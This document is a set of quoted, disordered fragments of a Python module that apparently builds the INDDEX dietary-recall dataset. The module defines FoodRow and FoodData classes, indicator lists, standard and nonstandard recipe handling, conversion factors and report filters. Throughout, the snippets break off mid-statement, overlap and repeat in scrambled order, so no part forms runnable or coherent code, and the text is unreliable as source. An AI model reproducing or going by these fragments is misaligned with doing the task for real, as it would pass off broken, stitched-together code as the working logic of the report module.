"NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients)",
"setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): #",
"in tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS =",
"the component pieces and presents the result as a unified dataset. FoodRow ::",
".const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import",
"NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def",
"def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in",
"are associated with the recipe case, but don't have a case of their",
"come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for",
"slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't",
"= True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some",
"= self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used =",
"for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction',",
"{} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid]",
"row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']:",
"sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return res def",
"filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for k",
"the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than",
"'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE,",
"**{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod",
"== NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code",
"food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code",
"ingredients into the report for them. Components ---------- FoodData :: This is the",
"'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def",
"on what data is or isn't available. Some of these foods are recipes,",
"= 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition",
"= ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code",
"not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete =",
"IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER),",
"= ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code",
"ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for",
"if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if",
"or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs):",
"is specified, show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type')",
"domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v",
"or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams",
"= recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE:",
"fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid =",
"presents the result as a unified dataset. FoodRow :: Class responsible for row-wise",
"food composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists",
"FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types:",
"IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class",
"= self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not",
"in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9',",
"(FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get(",
"no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports.",
"# NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe,",
"if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator in",
"not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not",
"from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for",
"def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction =",
"= [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients =",
"and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and",
"self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if",
"but don't have a case of their own. Nonstandard recipes are defined by",
"return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k)",
"\"\"\" import operator import uuid from collections import defaultdict from functools import reduce",
"of their own. Nonstandard recipes are defined by the user and beneficiary during",
"else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of",
"= recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else:",
"self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self,",
"age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <=",
"group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references",
"values, insert them from the master recipe nsr_cols = {col: master_recipe[col] for col",
"are defined by the user and beneficiary during a recall session. The ingredients",
"to generate the master dataset for the INDDEX reports Overview -------- Beneficiaries are",
"IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META),",
"I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER),",
"the recall session, calculated nutritional information, and auditing columns reporting on what data",
"in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def",
"raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe]",
"report for them. Components ---------- FoodData :: This is the interface to this",
"@memoized def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row)",
"{**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total",
"I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9',",
"This file contains the logic to generate the master dataset for the INDDEX",
"if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code",
"self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name:",
"isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in",
"IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR),",
"has a row for every food, with metadata about the recall session, calculated",
"None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions /",
"appear as separate rows in the report. Standard recipes have their ingredients enumerated",
"else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type ==",
"and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code ==",
"I: def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr =",
"= bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code",
"= None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code",
"class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row",
"try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if",
"their ingredients appear as separate rows in the report. Standard recipes have their",
"self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def",
"_set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction",
"IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR),",
"primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type',",
"raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections =",
"= _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows =",
"@property @memoized def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row):",
"None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul,",
"session, calculated nutritional information, and auditing columns reporting on what data is or",
"self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code",
"dataset for the INDDEX reports Overview -------- Beneficiaries are asked about their diet",
"ingredients appear as separate rows in the report. Standard recipes have their ingredients",
"FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if slug",
"I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username',",
"subsequent references point to the recipe definition with already_reported_recipe_case_id and don't enumerate the",
"recipe case, but don't have a case of their own. Nonstandard recipes are",
"return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows =",
"self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def",
"= _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes'",
"CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug tags",
"**nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total =",
"or isn't available. Some of these foods are recipes, and their ingredients appear",
"I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR),",
"self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return",
"ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams =",
"more than once, in which case subsequent references point to the recipe definition",
"row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not",
"== ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return",
"= set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta",
"set. It will be \" \"calculated outside the scope of FoodRow.\") return None",
"report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup table. This",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5',",
"collections import defaultdict from functools import reduce from memoized import memoized from corehq.apps.es",
"rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug",
"raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap()",
"'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4()",
"set, check if it can # be pulled from the food fixture or",
"I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR,",
"# Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id',",
"yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield",
"return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return",
"else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount,",
"slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a",
"in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in",
"I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR),",
"= 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def",
"hasn't yet been set. It will be \" \"calculated outside the scope of",
"\"food\" case that's a child of this foodrecall. This dataset has a row",
"ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7',",
"elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code]",
"self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used",
"ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else:",
"= ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None",
"slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain,",
"'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients:",
"{name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring",
"See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS",
"case, but don't have a case of their own. Nonstandard recipes are defined",
"= ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM",
"== FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type",
"in the report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup",
"IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'),",
"CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for",
"row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code:",
"the ingredients again. We need to insert duplicates of the previously reported ingredients",
"col in NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row, col,",
"data is or isn't available. Some of these foods are recipes, and their",
"Copy these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete =",
"IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR,",
"from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row",
"from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures",
"I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id',",
"to insert duplicates of the previously reported ingredients into the report for them.",
"_get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe':",
"in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not",
"col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr",
"ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code, fall back",
"IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'),",
"\"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\" for raw_row",
"# Copy these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete",
"as separate rows in the report. Standard recipes have their ingredients enumerated in",
"if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type ==",
"rows are associated with the recipe case, but don't have a case of",
"self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in",
"fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient =",
"FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code ==",
"available. Some of these foods are recipes, and their ingredients appear as separate",
"IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR),",
"i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ]",
"= [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR,",
"bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code =",
"_set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type ==",
"_recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std",
"for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw",
"been set. It will be \" \"calculated outside the scope of FoodRow.\") return",
"= { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections }",
"= ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code",
"= None return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return",
"their own. Nonstandard recipes are defined by the user and beneficiary during a",
"slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in",
"= { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients:",
"these values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True",
"associated with the recipe case, but don't have a case of their own.",
"# be pulled from the food fixture or from the parent food case's",
".fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER",
"I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE),",
"STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient cases ingredients",
"dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\" import",
"indicator definitions. \"\"\" import operator import uuid from collections import defaultdict from functools",
"row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values())",
"v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}}",
"= FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug",
"recipe, or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures)",
"row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe",
"['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan,",
"# NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor,",
"back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct)",
"res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res",
"rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row",
"self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code",
"may report eating a nonstandard recipe more than once, in which case subsequent",
"I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type',",
"IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'),",
"dataset has additional rows inserted for each ingredient. These rows are associated with",
"}) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request),",
"FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and",
"self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code =",
"IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug",
"master_recipe): # nsr references are missing some values, insert them from the master",
"self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code]",
"-------- Beneficiaries are asked about their diet in a \"recall\" session. This results",
